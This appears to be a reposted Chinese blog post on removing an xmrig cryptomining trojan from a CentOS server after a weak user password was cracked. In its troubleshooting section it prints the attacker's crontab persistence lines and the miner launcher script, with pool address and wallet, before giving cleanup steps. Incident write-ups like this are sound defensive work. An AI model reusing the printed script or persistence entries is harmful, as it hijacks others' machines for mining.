设为首页收藏本站
开启辅助访问

彻底清除Centos xmrig木马(普通用户情况)

 您所在的位置:网站首页 xmrig可以挖哪些币 彻底清除Centos xmrig木马(普通用户情况)

彻底清除Centos xmrig木马(普通用户情况)

2023-08-30 13:52| 来源: 网络整理| 查看: 265

文章目录 一、排查:二、解决三、后序

情况:

开发同事报update用户连接不上系统,故此上服务器查看由于是docker建立的系统没怎么在意安全,密码设置很简单 一、排查: # su - update 发现密码已经错误 # top

top命令查看

//可以看见CPU平均22点几,占用率更是高达1471%。 //还有update用户启的3个sh # kill -9 pid //杀掉了又会冒出来 # crontab -l //并不是我自己的,于是根据设置的路径去到对应目录 @daily /var/tmp/1 @reboot /var/tmp/run > /dev/null 2>&1 & disown @monthly /var/tmp/run > /dev/null 2>&1 & disown # ls /var/tmp //有一个可执行文件,打开文件查看,不清楚具体的意思,但根据查网上资料,可以肯定是一个挖矿的程序 1 #!/bin/bash #made by Maz4id#1363 locatie=$(cat /var/tmp/.logs/.local) if ! pgrep -x xmrig >/dev/null; then $locatie/./xmrig -o pool.supportxmr.com:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoL1V1P367MKSzjNZj --donate-level 0 -p xmrig > /dev/null 2>&1 & disown $* else : fi 二、解决

因为每次都杀不掉,所以需要找到xmrig命令,查看update家目录和/tmp,/var/tmp下的文件

# find . -name xmrig //在这个隐藏目录下->... /var/tmp/.../xmrig # ls //有几个脚本和二进制命令文件,将这几个改名或者删除 a haiduc nohup.out pgrep xmrig # crontab -e //删除执行的计划任务 # top //杀掉所起的进程 # kill -9 pid //发现另外3个sh进程还在运行,也找出进程号杀掉 三、后序

修改防火墙策略,以后会更加注重安装,不再因为是docker而忽略,幸好不是破解root用户,不然就可以为所欲为了。 贴几个参考链接,感谢。 参考链接1 参考链接2 最后有一个疑问,就是普通用户是怎么写进root里面的crontab计划任务里面。知道的兄弟留言一下



【本文地址】


今日新闻

推荐新闻

CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3